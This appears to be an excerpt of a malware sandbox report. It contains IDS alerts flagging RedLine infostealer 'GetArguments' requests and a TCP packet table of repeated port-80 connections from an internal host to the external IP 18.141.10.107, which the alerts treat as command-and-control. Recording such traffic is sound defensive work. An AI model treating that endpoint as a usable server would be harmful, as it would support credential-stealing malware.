2024-10-20T21:03:15.499426+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49974	18.141.10.107	80	TCP
2024-10-20T21:03:18.051436+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49987	18.141.10.107	80	TCP
2024-10-20T21:03:20.609574+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	49999	18.141.10.107	80	TCP
2024-10-20T21:03:23.165100+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50007	18.141.10.107	80	TCP
2024-10-20T21:03:25.819073+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50008	18.141.10.107	80	TCP
2024-10-20T21:03:28.382549+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50009	18.141.10.107	80	TCP
2024-10-20T21:03:30.947354+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50010	18.141.10.107	80	TCP
2024-10-20T21:03:33.463359+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50011	18.141.10.107	80	TCP
2024-10-20T21:03:35.962807+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50012	18.141.10.107	80	TCP
2024-10-20T21:03:38.421418+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50013	18.141.10.107	80	TCP
2024-10-20T21:03:40.843150+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50014	18.141.10.107	80	TCP
2024-10-20T21:03:43.250308+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50015	18.141.10.107	80	TCP
2024-10-20T21:03:45.617806+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50016	18.141.10.107	80	TCP
2024-10-20T21:03:47.952099+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50017	18.141.10.107	80	TCP
2024-10-20T21:03:50.270234+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50018	18.141.10.107	80	TCP
2024-10-20T21:03:52.569756+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50019	18.141.10.107	80	TCP
2024-10-20T21:03:55.110951+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50020	18.141.10.107	80	TCP
2024-10-20T21:03:57.550012+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50021	18.141.10.107	80	TCP
2024-10-20T21:03:59.765805+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50022	18.141.10.107	80	TCP
2024-10-20T21:04:01.976012+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50023	18.141.10.107	80	TCP
2024-10-20T21:04:04.159964+0200	2034361	ET MALWARE RedLine - GetArguments Request	1	192.168.2.5	50024	18.141.10.107	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 21:02:04.261671066 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:04.266705990 CEST	80	49704	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:04.266829014 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:04.283566952 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:04.288563013 CEST	80	49704	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:04.642263889 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:04.647269011 CEST	80	49704	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:05.829224110 CEST	80	49704	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:05.829392910 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:06.094630957 CEST	49704	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:06.099656105 CEST	80	49704	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:07.189769030 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:07.194829941 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:07.194953918 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:07.195065022 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:07.199968100 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:07.548538923 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:07.553528070 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:08.741961956 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:08.742005110 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:08.742100000 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:08.750032902 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:08.755467892 CEST	80	49705	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:08.755573034 CEST	49705	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:09.783278942 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:09.788513899 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:09.788604975 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:09.788760900 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:09.793715954 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:10.142242908 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:10.147347927 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:11.348874092 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:11.392076015 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:11.927690983 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:11.927897930 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:11.928131104 CEST	49706	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:11.933502913 CEST	80	49706	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:12.951692104 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:12.956712961 CEST	80	49707	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:12.956809044 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:12.958386898 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:12.963268995 CEST	80	49707	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:13.314109087 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:13.319089890 CEST	80	49707	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:14.540033102 CEST	80	49707	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:14.540121078 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:14.540235043 CEST	49707	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:14.545181036 CEST	80	49707	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:15.556891918 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:15.561909914 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:15.562011003 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:15.562393904 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:15.567486048 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:15.907783031 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:15.912609100 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:17.133744955 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:17.133781910 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:17.133861065 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:17.134239912 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:17.139662027 CEST	80	49708	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:17.139800072 CEST	49708	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:18.143719912 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:18.148683071 CEST	80	49713	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:18.148786068 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:18.149034977 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:18.154192924 CEST	80	49713	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:18.501557112 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:18.646982908 CEST	80	49713	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:19.917916059 CEST	80	49713	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:19.918328047 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:19.923783064 CEST	80	49713	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:19.923868895 CEST	49713	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:20.923870087 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:20.928770065 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:20.928858995 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:20.929020882 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:20.933881044 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:21.282757044 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:21.287811995 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:22.456445932 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:22.456461906 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:22.456520081 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:22.456777096 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:22.462037086 CEST	80	49727	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:22.462097883 CEST	49727	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:23.470753908 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:23.475692987 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:23.475881100 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:23.475944042 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:23.480983019 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:23.829780102 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:23.834819078 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:25.067586899 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:25.067603111 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:25.067847013 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:25.068068981 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:25.073204994 CEST	80	49742	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:25.073280096 CEST	49742	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:26.080391884 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:26.085624933 CEST	80	49752	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:26.085722923 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:26.085975885 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:26.090804100 CEST	80	49752	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:26.439042091 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:26.445044994 CEST	80	49752	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:27.612859011 CEST	80	49752	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:27.613147020 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:27.618818045 CEST	80	49752	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:27.618885994 CEST	49752	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:28.627095938 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:28.631953955 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:28.632041931 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:28.632296085 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:28.637092113 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:28.986020088 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:28.990988016 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:30.197283983 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:30.197432995 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:30.197493076 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:30.202209949 CEST	49763	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:30.207168102 CEST	80	49763	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:31.220989943 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:31.226963043 CEST	80	49775	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:31.227082014 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:31.227277994 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:31.232290983 CEST	80	49775	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:31.579915047 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:31.585290909 CEST	80	49775	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:32.791874886 CEST	80	49775	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:32.792047024 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:32.794750929 CEST	49775	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:32.799952030 CEST	80	49775	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:33.799467087 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:33.804574966 CEST	80	49787	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:33.804795980 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:33.804934978 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:33.810256004 CEST	80	49787	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:34.158037901 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:34.163394928 CEST	80	49787	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:35.364775896 CEST	80	49787	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:35.364873886 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:35.364972115 CEST	49787	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:35.369872093 CEST	80	49787	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:36.376981020 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:36.382199049 CEST	80	49797	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:36.382301092 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:36.382538080 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:36.387346029 CEST	80	49797	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:36.735929966 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:36.741060972 CEST	80	49797	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:38.422796011 CEST	80	49797	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:38.422893047 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:38.423075914 CEST	49797	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:38.427845001 CEST	80	49797	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:39.439713001 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:39.444677114 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:39.444768906 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:39.444983959 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:39.450028896 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:39.798471928 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:39.803440094 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:40.994419098 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:40.994688988 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:40.994756937 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:40.994894028 CEST	49811	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:41.000932932 CEST	80	49811	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:42.008426905 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:42.013439894 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:42.013586044 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:42.013925076 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:42.019696951 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:42.361083984 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:42.366070986 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:43.552083015 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:43.552141905 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:43.552294970 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:43.552412033 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:43.557801962 CEST	80	49823	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:43.557852030 CEST	49823	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:44.589025974 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:44.594173908 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:44.594249010 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:44.594475985 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:44.599239111 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:44.939131975 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:44.944066048 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:46.136037111 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:46.136080980 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:46.136199951 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:46.136409998 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:46.141799927 CEST	80	49834	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:46.141864061 CEST	49834	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:47.142878056 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:47.147881985 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:47.147953987 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:47.148197889 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:47.153023005 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:47.501687050 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:47.506577969 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:49.164705992 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:49.164752960 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:49.164824963 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:49.165170908 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:49.170428991 CEST	80	49847	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:49.170488119 CEST	49847	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:50.174057961 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:50.179141045 CEST	80	49860	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:50.179233074 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:50.179478884 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:50.184427023 CEST	80	49860	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:50.532835007 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:50.537802935 CEST	80	49860	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:51.747039080 CEST	80	49860	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:51.747236967 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:51.747236967 CEST	49860	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:51.752065897 CEST	80	49860	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:52.751981974 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:52.756889105 CEST	80	49872	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:52.756967068 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:52.757081032 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:52.762521029 CEST	80	49872	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:53.114702940 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:53.119631052 CEST	80	49872	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:54.307440996 CEST	80	49872	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:54.307507038 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:54.307610989 CEST	49872	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:54.313344955 CEST	80	49872	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:55.314538002 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:55.319485903 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:55.319570065 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:55.319730997 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:55.324685097 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:55.673580885 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:55.678525925 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:56.904721975 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:56.905200005 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:56.905257940 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:56.905411959 CEST	49883	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:56.910279989 CEST	80	49883	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:57.908390045 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:57.913463116 CEST	80	49897	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:57.913580894 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:57.913707018 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:57.918580055 CEST	80	49897	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:58.267163038 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:58.272039890 CEST	80	49897	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:59.466890097 CEST	80	49897	18.141.10.107	192.168.2.5
Oct 20, 2024 21:02:59.466963053 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:59.467073917 CEST	49897	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:02:59.471959114 CEST	80	49897	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:00.470730066 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:00.475646973 CEST	80	49912	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:00.478466988 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:00.478621960 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:00.484005928 CEST	80	49912	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:00.829677105 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:00.834661961 CEST	80	49912	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:02.050719976 CEST	80	49912	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:02.050808907 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:02.050893068 CEST	49912	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:02.055854082 CEST	80	49912	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:03.082242966 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:03.087280989 CEST	80	49923	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:03.091465950 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:03.091626883 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:03.096615076 CEST	80	49923	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:03.439096928 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:03.444067955 CEST	80	49923	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:05.062438965 CEST	80	49923	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:05.062589884 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:05.062709093 CEST	49923	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:05.067653894 CEST	80	49923	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:06.064501047 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:06.069525003 CEST	80	49938	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:06.069670916 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:06.069849014 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:06.075241089 CEST	80	49938	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:06.423458099 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:06.428827047 CEST	80	49938	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:07.601063013 CEST	80	49938	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:07.601149082 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:07.601243019 CEST	49938	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:07.606103897 CEST	80	49938	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:08.611320019 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:08.616271973 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:08.616367102 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:08.616539955 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:08.621786118 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:08.970402002 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:08.975996971 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:10.161314964 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:10.161799908 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:10.161870956 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:10.161919117 CEST	49950	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:10.166960001 CEST	80	49950	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:11.173968077 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:11.180027008 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:11.180234909 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:11.180259943 CEST	49961	80	192.168.2.5	18.141.10.107
